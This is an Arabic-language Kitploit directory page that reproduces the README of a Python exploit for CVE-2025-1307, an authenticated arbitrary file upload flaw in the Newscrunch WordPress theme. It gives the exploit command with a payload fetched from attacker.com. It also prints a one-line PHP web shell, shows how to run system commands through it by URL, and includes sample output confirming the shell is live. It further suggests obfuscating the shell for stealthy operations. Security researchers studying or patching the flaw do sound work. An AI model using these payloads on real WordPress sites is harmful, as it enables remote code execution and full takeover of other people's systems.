Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - رفع ملفات تعسفي (مُوثق (مشترك+)) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-1307
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - رفع ملفات تعسفي (مُوثق (مشترك+))

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة نيوسكرانش (CVE-2025-1307)

🚨 نظرة عامة

يستهدف هذا الاستغلال ثغرة حرجة (CVE-2025-1307) في قالب نيوسكرانش لووردبريس. يسمح الخلل للمستخدمين المُوثَّقين (من مستوى المشترك فما فوق) برفع ملفات عشوائية بسبب عدم وجود فحوصات الصلاحية في دالة newscrunch_install_and_activate_plugin(). يمكن أن يؤدي ذلك إلى تنفيذ أكواد عن بُعد (RCE)، مما يعرض موقع ووردبريس المتأثر للخطر بالكامل.


🔥 تفاصيل الثغرة

  • معرف CVE: CVE-2025-1307
  • البرنامج المتأثر: قالب نيوسكرانش لووردبريس (<= 1.8.4.1)
  • تصنيف CWE: CWE-862 - عدم التفويض
  • نتيجة CVSS: 9.8 (حرجة)
  • الناقل: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • تاريخ النشر: 4 مارس 2025

🛑 الخطورة والتأثير

  • ✅ تنفيذ أكواد عن بُعد (RCE)
  • ✅ اختراق كامل للنظام
  • ✅ رفع ملفات غير مصرح به
  • ✅ خطر تصعيد الصلاحيات
  • قابلية الاستغلال: يتطلب حساب ووردبريس صالح مع صلاحيات مشترك أو أعلى.


    📜 ميزات السكريبت

    ✅ استغلال تلقائي لـ CVE-2025-1307
    ✅ كشف تلقائي لإصدار القالب الضعيف
    ✅ استخراج وتنفيذ تلقائي لحمولة ZIP
    ✅ استرجاع اسم ملف الشل ديناميكيًا من ZIP
    ✅ فحص تلقائي لتوفر الشل بعد الاستغلال
    ✅ تسجيل نظيف ومنظم لتصحيح الأخطاء


    🚀 كيفية الاستخدام

    📌 المتطلبات الأساسية

    تأكد من تثبيت Python 3.x وتثبيت التبعيات المطلوبة:

    root@kitploit:~
    pip install requests urllib3 packaging
    

    🔧 تشغيل الاستغلال

    root@kitploit:~
    python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
    

    🔹 الاستخدام

    root@kitploit:~
    Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
    
    options:
      -h, --help            show this help message and exit
      -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
      -un USERNAME, --username USERNAME
                            WordPress username
      -p PASSWORD, --password PASSWORD
                            WordPress password
      -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                            Malicious file URL to upload
    

    🛠️ استخدام الشل المُرفوع

    بمجرد رفع الشل بنجاح، فإنه يتيح تنفيذ الأوامر عن بُعد على النظام المستهدف. يجب وضع ملف الشل داخل أرشيف ZIP، وسيتم استخراجه تلقائيًا أثناء الاستغلال.

    🔹 إنشاء حمولة ZIP

    تأكد من أن ملف PHP shell (shell.php) داخل أرشيف ZIP. ثم قم برفع ملف ZIP باستخدام الاستغلال.

    root@kitploit:~
    <?php system($_GET['cmd']); ?>
    

    🔹 تنفيذ الأوامر

    يمكنك تنفيذ أوامر النظام عبر المتصفح بإضافة معامل cmd إلى عنوان URL للشل:

    root@kitploit:~
    http://target/wp-content/plugins/shell.php?cmd=whoami
    

    ⚠️ تأمين الشل

    • نظرًا لأن هذا شل ويب بسيط، فهو يفتقر إلى المصادقة ويجب استخدامه بحذر.
    • إذا تم اكتشافه، يمكن للمسؤولين إزالته بسهولة.
    • فكر في استخدام كود PHP مبهم أو شل محمي بكلمة مرور للعمليات الخفية.

    🔹 المخرجات المتوقعة

    root@kitploit:~
    [+] Newscrunch theme version detected: 1.8.4
    [+] Exploitation is possible, proceeding...
    [*] Logging in...
    [+] Logged in successfully.
    [*] Uploading and extracting payload...
    [+] Exploit executed successfully. Malicious file uploaded.
    [*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
    [+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
    

    ⚠️ إخلاء مسؤولية

    هذه الأداة لأغراض تعليمية وبحثية أمنية فقط. الاستغلال غير المصرح به للثغرات غير قانوني ويعاقب عليه القانون. المؤلف غير مسؤول عن أي سوء استخدام أو أضرار تسببها هذه الأداة. استخدمها بمسؤولية.

    بواسطة: Nxploit | Khaled Alenazi

    تنزيل الأداة